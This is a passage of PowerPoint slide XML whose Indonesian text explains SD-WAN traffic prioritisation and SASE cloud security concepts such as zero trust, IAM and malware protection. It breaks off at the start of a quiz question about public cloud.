              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melintasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelompokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SD-WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SD-WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memusatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Secure Access Service Edge (SASE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelincahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh cloud. SASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ujung-ke-ujung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (WAN) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust. SASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Identity and Access Management (IAM) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SASE juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58342413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1. What is a public cloud?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
